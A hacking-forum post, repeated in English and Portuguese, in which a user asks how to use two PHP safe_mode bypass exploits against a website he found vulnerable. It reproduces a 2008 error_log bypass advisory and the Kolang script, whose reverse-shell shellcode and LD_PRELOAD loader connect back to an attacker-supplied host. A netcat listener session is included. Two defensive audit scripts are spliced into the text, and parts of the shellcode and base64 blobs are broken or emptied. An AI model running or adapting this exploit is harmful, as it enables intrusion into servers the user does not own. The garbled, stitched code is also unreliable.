Hi, I found a vulnerability on a website and I already have some exploits; I'd like to know how to use them :(
The vulnerability I want to exploit is the PHP safe_mode bypass.
Please help me.
Here is the exploit code.
1st:
[ SecurityReason.com PHP 5.2.6 (error_log) safe_mode bypass ]
Author: Maksymilian Arciemowicz (cXIb8O3)
securityreason.com
Date:
- Written: 10.11.2008
- Public: 20.11.2008
SecurityReason Research
SecurityAlert Id: 57
CWE: CWE-264
SecurityRisk: Medium
Affected Software: PHP 5.2.6
Advisory URL: [link visible only to registered forum users]
Vendor: [link visible only to registered forum users]
--- 0. Description ---
PHP is an HTML-embedded scripting language. Much of its syntax is borrowed from C, Java and Perl
with a couple of unique PHP-specific features thrown in. The goal of the language is to allow web
developers to write dynamically generated pages quickly.
error_log
They allow you to define your own error handling rules, as well as modify the way the errors can
be logged. This allows you to change and enhance error reporting to suit your needs.
--- 0. error_log const. bypassed by php_admin_flag ---
The main problem is the difference between using safe_mode in global mode in
php.ini:
safe_mode = On
and declaring via php_admin_flag
<Directory "/www">
...
php_admin_flag safe_mode On
</Directory>
When we create some PHP script in /www/ and try to call:
ini_set("error_log", "/hack/");
or in /www/.htaccess
php_value error_log "/hack/bleh.php"
Result:
Warning: Unknown: SAFE MODE Restriction in effect. The script whose uid is 80 is not allowed to access /hack/ owned by uid 1001 in Unknown on line 0
Warning: ini_set() [function.ini-set]: SAFE MODE Restriction in effect. The script whose uid is 80 is not allowed to access /hack/ owned by uid 1001 in /www/phpinfo.php on line 4
It was for safe_mode declared in php.ini. But if we use
php_admin_flag safe_mode On
in httpd.conf, we will get only
Warning: ini_set() [function.ini-set]: SAFE MODE Restriction in effect. The script whose uid is 80 is not allowed to access /hack/ owned by uid 1001 in /www/phpinfo.php on line 4
the syntax in .htaccess
php_value error_log "/hack/blehx.php"
is allowed and bypasses safe_mode.
example exploit:
error_log("<?php phpinfo(); ?>", 0);
--- 2. How to fix ---
Fixed in CVS
[link visible only to registered forum users]
Note:
Do not use safe_mode as the main safety measure.
--- 3. Greets ---
sp3x Infospec schain p_e_a pi3
--- 4. Contact ---
Author: SecurityReason [ Maksymilian Arciemowicz ( cXIb8O3 ) ]
Email: cxib [at] securityreason [dot] com
GPG: [link visible only to registered forum users]
# milw0rm.com [2008-11-20]
2nd:
<?php
/*
Kolang (PHP Safe mode bypass)
(IHSteam priv8 for lazy penetration testers)
(php 4.3.10 - 5.3.0)
[link visible only to registered forum users] (12/19/2009)
[link visible only to registered forum users] (12/09/2008)
1- Kolang can be used directly in file inclusion RFI&LFI vulnerabilities (no upload required)
2- Kolang can execute arbitrary shellcode (just for fans of metasploit )
~~~~ How to use :)
for linux:
kolang.php?os=linux&host=LHOST&port=LPORT
or
kolang.php?os=linux&shell=BASE64_ENCODED_SHELLCODE
for freebsd:
kolang.php?os=freebsd&shell=BASE64_ENCODED_SHELLCODE
file inclusion :
[example links visible only to registered forum users]
hamid@bugtraq ~ $ nc -vv -l -p 2121
listening on [any] 2121 ...
connect to [127.0.0.1] from bugtraq [127.0.0.1] 40526
id
uid=65534(nobody) gid=65533(nogroup) groups=65533(nogroup)
Hamid Ebadi
[link visible only to registered forum users]
contact : ebadi~bugtraq~ir
Kolang means pickaxe (the idea came from amnafzar naming convention)
(Separ, Sarand, Alak, Skort)
*/
$port= intval($_REQUEST['port']);
$host= $_REQUEST['host'];
$os= $_REQUEST['os'];
/*
//compile : cc -o shellcode.so -fPIC -shared shellcode.c
//
//<?php
//$data=file_get_contents('shellcode.so');
//file_put_contents('shellcode_base64.txt',$data);
//?>
// "shellcode loader" : load and execute arbitrary shellcode from a file
// Hamid Ebadi
#define O_RDONLY 00 ; fcntl.h
#define SHELLCODE_MAX_SIZE 1024
// change kolang.php and shellcode loader if sys_get_temp_dir()!='/tmp'
#define SHELLCODE_FILENAME "/tmp/.X11-IHSTEAM"
void getuid()
{
unsetenv("LD_PRELOAD"); //not really necessary, we can remove it
int fd;
char shellcode[SHELLCODE_MAX_SIZE];
char filename[]=SHELLCODE_FILENAME ;
// we can also pass the shellcode in program's arguments
if ((fd = open(SHELLCODE_FILENAME,O_RDONLY)) < 0) {
exit(1);
}
if (read(fd,shellcode,SHELLCODE_MAX_SIZE) < 0){
exit(1);
}
(*(void(*)()) shellcode)();
}
*/
if ($_REQUEST['os']=='freebsd'){
// freebsd shellcode loader (x86)
$shellcode_loader = ""; // base64-encoded FreeBSD x86 ELF loader blob omitted here (garbled in the forum copy)
}else{
// default: linux
// linux shellcode loader (x86)
$shellcode_loader = ""; // base64-encoded Linux x86 ELF loader blob omitted here (garbled in the forum copy)
}
if (!function_exists('file_put_contents')){
function file_put_contents($filename, $data){
$f = @fopen($filename, 'w');
if (!$f){
return false;
}
else{
$bytes = fwrite($f, $data);
fclose($f);
return $bytes;
}
}
}
// Note: change kolang.php and shellcode loader if sys_get_temp_dir()!='/tmp'
file_put_contents('/tmp/shellcode.so' , base64_decode($shellcode_loader));
$ip = gethostbyname($host);
$port1 = sprintf('%c', ($port>> 8)&255 );
$port2 = sprintf('%c', ($port>> 0)&255 );
$part = explode('.', $ip);
//$HEXIP = sprintf('%02x%02x%02x%02x', $part[0], $part[1], $part[2], $part[3]);
$STRINGIP = sprintf('%c%c%c%c', $part[0], $part[1], $part[2], $part[3]);
/*
* linux/x86/shell_reverse_tcp - 71 bytes
* [link visible only to registered forum users]
* Encoder: generic/none
* LHOST=$STRINGIP, LPORT=$port1.$port2, ReverseConnectRetries=5,
* PrependSetresuid=false, PrependSetreuid=false,
* PrependSetuid=false, PrependChrootBreak=false,
* AppendExit=false
*/
$Xshellcode =
"\x31\xdb\xf7\xe3\x53\x43\x53\x6a\x02\x89\xe1\xb0\ x66\xcd\x80".
"\x5b\x5e\x68".$STRINGIP."\x66\x68".$port1.$port2. "\x66\x53\x6a\x10".
"\x51\x50\x89\xe1\x43\x6a\x66\x58\xcd\x80\x59\x87\ xd9\xb0\x3f".
"\xcd\x80\x49\x79\xf9\x50\x68\x2f\x2f\x73\x68\x68\ x2f\x62\x69".
"\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80\ x00" ;
if(isset($_REQUEST['shellcode'])){
// just for fans of metasploit
$Xshellcode=base64_decode($_REQUEST['shellcode']);
}
file_put_contents("/tmp/.X11-IHSTEAM", $Xshellcode);
$cwd = '/tmp/';
$env = array('LD_PRELOAD' => '/tmp/shellcode.so');
unset($var);
$descriptorspec = array(0 => array("pipe", "r"), 1 => array("pipe", "w"));
// BOOM
proc_open('IHSteam', $descriptorspec, $var, $cwd, $env);
mail("IHSteam","IHSteam","IHSteam","IHSteam");
?>
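Both pasted techniques depend on a handful of host settings: safe_mode being the only boundary, an error_log directive that a script or .htaccess can move, process-spawning functions that accept a caller-supplied environment, and no open_basedir. The following audit script is added here as an example and is not part of the forum post or of either exploit; it checks a PHP host for those conditions from the defender's side, is written for PHP 5.3 and later, and the script name safe_mode_audit.php and the function names are my own choices.

```php
<?php
// safe_mode_audit.php (added example, not from the forum post or either exploit):
// report the host settings the two quoted techniques rely on.
// Run it as the web server user, e.g. "php safe_mode_audit.php" or through a test vhost.

/** Read a boolean ini flag ("1"/"On"/"true"); a missing directive counts as off. */
function iniFlag($name)
{
    $value = ini_get($name);
    return $value !== false && filter_var($value, FILTER_VALIDATE_BOOLEAN);
}

/** Names listed in disable_functions, trimmed, as a lookup set. */
function disabledFunctions()
{
    $names = array_map('trim', explode(',', (string) ini_get('disable_functions')));
    return array_fill_keys(array_filter($names), true);
}

/** Return human-readable findings; an empty array means nothing was flagged. */
function auditSafeModeAssumptions()
{
    $findings = array();

    // 1. safe_mode was never a real boundary (the advisory says so itself) and
    //    was removed in PHP 5.4. A host old enough to still have it is the finding.
    if (version_compare(PHP_VERSION, '5.4.0', '<')) {
        $findings[] = 'PHP ' . PHP_VERSION . ' still ships safe_mode (on: '
            . (iniFlag('safe_mode') ? 'yes' : 'no') . '); upgrade rather than rely on it';
    }

    // 2. The advisory's bypass turns error_log() into a file write to whatever path
    //    error_log points at. When the directive is set with php_admin_value in
    //    httpd.conf, ini_set() returns false and .htaccess php_value cannot override it.
    $probe = sys_get_temp_dir() . DIRECTORY_SEPARATOR . 'safe_mode_audit_probe.log';
    if (@ini_set('error_log', $probe) !== false) {
        ini_restore('error_log');
        $findings[] = 'error_log can be changed at runtime; lock it with '
            . 'php_admin_value error_log in httpd.conf and AllowOverride None';
    }

    // 3. Kolang spawns a child with a caller-supplied environment (LD_PRELOAD)
    //    through proc_open(), with mail() as a fallback. Any of these still
    //    enabled gives a script that route regardless of safe_mode.
    $disabled = disabledFunctions();
    $spawners = array('proc_open', 'popen', 'exec', 'shell_exec', 'system',
                      'passthru', 'putenv', 'mail');
    $enabled = array();
    foreach ($spawners as $fn) {
        if (!isset($disabled[$fn]) && function_exists($fn)) {
            $enabled[] = $fn;
        }
    }
    if ($enabled !== array()) {
        $findings[] = 'process/environment-controlling functions enabled: '
            . implode(', ', $enabled) . ' (add the ones you do not need to disable_functions)';
    }

    // 4. Both exploits stage their payloads in /tmp before executing them. With no
    //    open_basedir a script can read and write anywhere its uid can reach.
    if ((string) ini_get('open_basedir') === '') {
        $findings[] = 'open_basedir is unset; restrict scripts to the document root '
            . 'and a private upload_tmp_dir';
    }

    return $findings;
}

$findings = auditSafeModeAssumptions();
if ($findings === array()) {
    echo "no findings\n";
} else {
    foreach ($findings as $i => $finding) {
        printf("%d. %s\n", $i + 1, $finding);
    }
}
```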
![Triste!](https://forum.guiadohacker.com.br/images/smilies/13021.gif)
a vulnerabilidade que quero explorar é PHP safemode bypass
por favor ajudem-me
aqui o código exploit
1º:
[ SecurityReason.com PHP 5.2.6 (error_log) safe_mode bypass ]
Author: Maksymilian Arciemowicz (cXIb8O3)
securityreason.com
Date:
- - Written: 10.11.2008
- - Public: 20.11.2008
SecurityReason Research
SecurityAlert Id: 57
CWE: CWE-264
SecurityRisk: Medium
Affected Software: PHP 5.2.6
Advisory URL: Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...
Vendor: Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...
- --- 0.Description ---
PHP is an HTML-embedded scripting language. Much of its syntax is borrowed from C, Java and Perl
with a couple of unique PHP-specific features thrown in. The goal of the language is to allow web
developers to write dynamically generated pages quickly.
error_log
They allow you to define your own error handling rules, as well as modify the way the errors can
be logged. This allows you to change and enhance error reporting to suit your needs.
- --- 0. error_log const. bypassed by php_admin_flag ---
The main problem is between using safe_mode in global mode
php.iniÂ*:
safe_mode = On
and declaring via php_admin_flag
<Directory "/www">
...
php_admin_flag safe_mode On
</Directory>
When we create some php script in /www/ and try call to:
ini_set("error_log", "/hack/");
or in /www/.htaccess
php_value error_log "/hack/bleh.php"
Result:
Warning: Unknown: SAFE MODE Restriction in effect. The script whose uid is 80 is not allowed to access /hack/ owned by uid 1001 in Unknown on line 0
Warning: ini_set() [function.ini-set]: SAFE MODE Restriction in effect. The script whose uid is 80 is not allowed to access /hack/ owned by uid 1001 in /www/phpinfo.php on line 4
It was for safe_mode declared in php.ini. But if we use
php_admin_flag safe_mode On
in httpd.conf, we will get only
Warning: ini_set() [function.ini-set]: SAFE MODE Restriction in effect. The script whose uid is 80 is not allowed to access /hack/ owned by uid 1001 in /www/phpinfo.php on line 4
syntax in .htaccess
php_value error_log "/hack/blehx.php"
is allowed and bypass safe_mode.
example exploit:
error_log("<?php phpinfo(); ?>", 0);
- --- 2. How to fix ---
Fixed in CVS
Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...
Note:
Do not use safe_mode as a main safety.
--- 3. Greets ---
sp3x Infospec schain p_e_a pi3
- --- 4. Contact ---
Author: SecurityReason [ Maksymilian Arciemowicz ( cXIb8O3 ) ]
Email: cxib [at] securityreason [dot] com
GPG: Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...
Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...
Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...
# milw0rm.com [2008-11-20]
2º:
<?php
/*
Kolang (PHP Safe mode bypass)
(IHSteam priv8 for lazy penetration testers)
(php 4.3.10 - 5.3.0)
Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar... (12/19/2009)
Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar... (12/09/2008)
1- Kolang can be used directly in file inclusion RFI&LFI vulnerabilities (no upload required)
2- Kolang can execute arbitrary shellcode (just for fans of metasploit )
~~~~ How to use
![Feliz](https://forum.guiadohacker.com.br/images/smilies/smile.png)
for linux:
kolang.php?os=linux&host=LHOST&port=LPORT
or
kolang.php?os=linux&shell=BASE64_ENCODED_SHELLCODE
for freebsd:
kolang.php?os=freebsd&shell=BASE64_ENCODED_SHELLCO DE
file inclusion :
Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...
Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...
hamid@bugtraq ~ $ nc -vv -l -p 2121
listening on [any] 2121 ...
connect to [127.0.0.1] from bugtraq [127.0.0.1] 40526
id
uid=65534(nobody) gid=65533(nogroup) groups=65533(nogroup)
Hamid Ebadi
Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...
contact : ebadi~bugtraq~ir
Kolang means pickaxe (the idea came from amnafzar naming convention)
(Separ, Sarand, Alak, Skort)
*/
$port= intval($_REQUEST['port']);
$host= $_REQUEST['host'];
$os= $_REQUEST['os'];
/*
//compile : cc -o shellcode.so -fPIC -shared shellcode.c
//
//<?php
//$data=file_get_contents('shellcode.so');
//file_put_contents('shellcode_base64.txt',$data);
//?>
// "shellcode loader" : load and execute arbitrary shellcode from a file
// Hamid Ebadi
#define O_RDONLY 00 ; fcntl.h
#define SHELLCODE_MAX_SIZE 1024
// change kolang.php and shellcode loader if sys_get_temp_dir()!='/tmp'
#define SHELLCODE_FILENAME "/tmp/.X11-IHSTEAM"
void getuid()
{
unsetenv("LD_PRELOAD"); //not really necessary, we can remove it
int fd;
char shellcode[SHELLCODE_MAX_SIZE];
char filename[]=SHELLCODE_FILENAME ;
// we can also pass the shellcode in program's arguments
if ((fd = open(SHELLCODE_FILENAME,O_RDONLY)) < 0) {
exit(1);
}
if (read(fd,shellcode,SHELLCODE_MAX_SIZE) < 0){
exit(1);
}
(*(void(*)()) shellcode)();
}
*/
if ($_REQUEST['os']=='freebsd'){
// freebsd shellcode loader (x86)
$shellcode_loader=
"f0VMRgEBAQkAAAAAAAAAAAMAAwABAAAAeAUAADQAAADsCQAAA AAAADQAIAADACgAFwAUAAEAAAAA
AAAAAAAAAAAAAADhBwAA4QcAAAUAAAAAEAAAAQAAAOQHAADkFw AA5BcAAPwAAAAYAQAABgAAAAAQ
AAACAAAA8AcAAPAXAADwFwAAoAAAAKAAAAAGAAAABAAAABEAAA AkAAAAAAAAAB0AAAAeAAAAIgAA
ABUAAAAAAAAAAAAAABoAAAAcAAAAIwAAACEAAAAbAAAAAAAAAC AAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAXAAAAFAAAABYA
AAAZAAAAAAAAAB8AAAAAAAAAAAAAABgAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAJQAAAAAAAAAAwAB
AAAAAABwAQAAAAAAAAMAAgAAAAAAsAMAAAAAAAADAAMAAAAAAG QEAAAAAAAAAwAEAAAAAACUBAAA
AAAAAAMABQAAAAAA1AQAAAAAAAADAAYAAAAAAOgEAAAAAAAAAw AHAAAAAAB4BQAAAAAAAAMACAAA
AAAAJAcAAAAAAAADAAkAAAAAADAHAAAAAAAAAwAKAAAAAADkFw AAAAAAAAMACwAAAAAA7BcAAAAA
AAADAAwAAAAAAPAXAAAAAAAAAwANAAAAAACQGAAAAAAAAAMADg AAAAAAmBgAAAAAAAADAA8AAAAA
AKAYAAAAAAAAAwAQAAAAAACkGAAAAAAAAAMAEQAAAAAA4BgAAA AAAAADABIAAAAAAAAAAAAAAAAA
AwATAIQAAAAAAAAAAAAAABAAAAABAAAA8BcAAAAAAAARAPH/LAAAAAAAAAAAAAAAIAAAAH0AAABU
BgAAnQAAABIACAAgAAAA1AQAAAAAAAASAAYAOwAAAAAAAAAAAA AAIAAAAJcAAAAAAAAAAAAAABAA
AACjAAAA4BgAAAAAAAAQAPH/JgAAACQHAAAAAAAAEgAJAJwAAADgGAAAAAAAABAA8f8KAAAApB gA
AAAAAAARAPH/rwAAAPwYAAAAAAAAEADx/5IAAAAAAAAAAAAAABAAAACNAAAAAAAAAAAAAAAQAAAA
aQAAAAAAAAAAAAAAIAAAAFMAAAAAAAAAAAAAACAAAAAAX0RZTk FNSUMAX0dMT0JBTF9PRkZTRVRf
VEFCTEVfAF9pbml0AF9maW5pAF9fY3hhX2ZpbmFsaXplAF9fZG VyZWdpc3Rlcl9mcmFtZV9pbmZv
AF9fcmVnaXN0ZXJfZnJhbWVfaW5mbwBfSnZfUmVnaXN0ZXJDbG Fzc2VzAGdldHVpZAB1bnNldGVu
dgBvcGVuAGV4aXQAcmVhZABfZWRhdGEAX19ic3Nfc3RhcnQAX2 VuZADkFwAACAAAAOgXAAAIAAAA
0BgAAAYWAADUGAAABhkAANgYAAAGIgAA3BgAAAYjAACwGAAABx QAALQYAAAHFgAAuBgAAAcZAAC8
GAAABxoAAMAYAAAHIAAAxBgAAAchAADIGAAAByIAAMwYAAAHIw AAg+wM6BQBAADoEwIAAIPEDMMA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 RpLlMsdiAx
LjcgMjAwNS8wNS8xOSAwNzozMTowNiBkZnIgRXhwICQATERfUF JFTE9BRAAvdG1wLy5YMTEtSUhT
VEVBTQAkRnJlZUJTRDogc3JjL2xpYi9jc3UvaTM4Ni1lbGYvY3 J0bi5TLHYgMS42IDIwMDUvMDUv
MTkgMDc6MzE6MDYgZGZyIEV4cCAkAAAAAOQXAACcGAAAAAAAAA wAAADUBAAADQAAACQHAAAEAAAA
lAAAAAUAAACwAwAABgAAAHABAAAKAAAAtAAAAAsAAAAQAAAAAw AAAKQYAAACAAAAQAAAABQAAAAR
AAAAFwAAAJQEAAARAAAAZAQAABIAAAAwAAAAEwAAAAgAAAD6//9vAgAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAD/////AAAAAP////8AAAAAAAAAAPAXAAAAAAAAAAAA
AP4EAAAOBQAAHgUAAC4FAAA+BQAATgUAAF4FAABuBQAAAAAAAA AAAAAAAAAAAAAAAABHQ0M6IChH
TlUpIDMuNC42IFtGcmVlQlNEXSAyMDA2MDMwNQAAR0NDOiAoR0 5VKSAzLjQuNiBbRnJlZUJTRF0g
MjAwNjAzMDUAAEdDQzogKEdOVSkgMy40LjYgW0ZyZWVCU0RdID IwMDYwMzA1AAAuc3ltdGFiAC5z
";
}else{
// default: linux
// linux shellcode loader (x86)
$shellcode_loader=
"";
}
if (!function_exists('file_put_contents')){
function file_put_contents($filename, $data){
$f = @fopen($filename, 'w');
if (!$f){
return false;
}
else{
$bytes = fwrite($f, $data);
fclose($f);
return $bytes;
}
}
}
// Note: change kolang.php and shellcode loader if sys_get_temp_dir()!='/tmp'
file_put_contents('/tmp/shellcode.so' , base64_decode($shellcode_loader));
$ip = gethostbyname($host);
$port1 = sprintf('%c', ($port>> 8)&255 );
$port2 = sprintf('%c', ($port>> 0)&255 );
$part = explode('.', $ip);
//$HEXIP = sprintf('%02x%02x%02x%02x', $part[0], $part[1], $part[2], $part[3]);
$STRINGIP = sprintf('%c%c%c%c', $part[0], $part[1], $part[2], $part[3]);
/*
* linux/x86/shell_reverse_tcp - 71 bytes
* Encoder: generic/none
* LHOST=$STRINGIP, LPORT=$port1.$port2, ReverseConnectRetries=5,
* PrependSetresuid=false, PrependSetreuid=false,
* PrependSetuid=false, PrependChrootBreak=false,
* AppendExit=false
*/
$Xshellcode =
"\x31\xdb\xf7\xe3\x53\x43\x53\x6a\x02\x89\xe1\xb0\x66\xcd\x80".
"\x5b\x5e\x68".$STRINGIP."\x66\x68".$port1.$port2."\x66\x53\x6a\x10".
"\x51\x50\x89\xe1\x43\x6a\x66\x58\xcd\x80\x59\x87\xd9\xb0\x3f".
"\xcd\x80\x49\x79\xf9\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69".
"\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80\x00" ;
if(isset($_REQUEST['shellcode'])){
// just for fans of metasploit
$Xshellcode=base64_decode($_REQUEST['shellcode']);
}
file_put_contents("/tmp/.X11-IHSTEAM", $Xshellcode);
$cwd = '/tmp/';
$env = array('LD_PRELOAD' => '/tmp/shellcode.so');
unset($var);
$descriptorspec = array(0 => array("pipe", "r"), 1 => array("pipe", "w"));
// BOOM
proc_open('IHSteam', $descriptorspec, $var, $cwd, $env);
mail("IHSteam","IHSteam","IHSteam","IHSteam");
?>
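As an added defensive example (not part of the original post or of the exploit author's code), the following PHP audit reports whether a runtime exposes the conditions the loader above relies on: a callable process-spawning function (proc_open with a caller-supplied environment, or mail(), which runs sendmail_path), a writable temp directory for the dropped .so, and an open_basedir that still allows writing there. The function name audit_preload_exposure is my own; run it with the php CLI against the php.ini you want to check.

```php
<?php
// Added defensive audit, not from the original post. Reports the runtime
// conditions the LD_PRELOAD loader above depends on, so an administrator can
// see which of them a given php.ini still leaves open.
function audit_preload_exposure()
{
    $findings = array();
    $disabled = array_filter(array_map('trim',
        explode(',', (string) ini_get('disable_functions'))));
    $callable = function ($fn) use ($disabled) {
        return function_exists($fn) && !in_array($fn, $disabled, true);
    };

    // 1. Functions that start a child process. proc_open() also accepts an
    //    environment array, which is how LD_PRELOAD reaches the child here.
    foreach (array('proc_open', 'popen', 'exec', 'shell_exec', 'system', 'passthru') as $fn) {
        if ($callable($fn)) {
            $findings[] = "$fn() is callable; add it to disable_functions if the application does not need it";
        }
    }
    // 2. mail() spawns sendmail_path, a child that inherits the worker's environment.
    if ($callable('mail')) {
        $findings[] = 'mail() is callable (sendmail_path=' . ini_get('sendmail_path')
            . '); disable it or use a socket-based mailer instead';
    }

    // 3. The dropped .so must land somewhere the PHP worker can write and the
    //    dynamic loader can read; open_basedir decides whether that is allowed.
    $tmp = rtrim(sys_get_temp_dir(), '/');
    if (is_writable($tmp)) {
        $findings[] = "$tmp is writable by the PHP worker uid";
    }
    $basedir = (string) ini_get('open_basedir');
    if ($basedir === '') {
        $findings[] = "open_basedir is unset; file_put_contents() may write to $tmp";
    } else {
        foreach (explode(PATH_SEPARATOR, $basedir) as $dir) {
            if (strpos($tmp . '/', rtrim($dir, '/') . '/') === 0) {
                $findings[] = "open_basedir includes $dir, so writes to $tmp are still allowed";
            }
        }
    }
    return $findings;
}

foreach (audit_preload_exposure() as $line) {
    echo "[!] $line\n";
}
```

An empty result means none of the three preconditions is present in this configuration; each reported line names the php.ini directive that closes it.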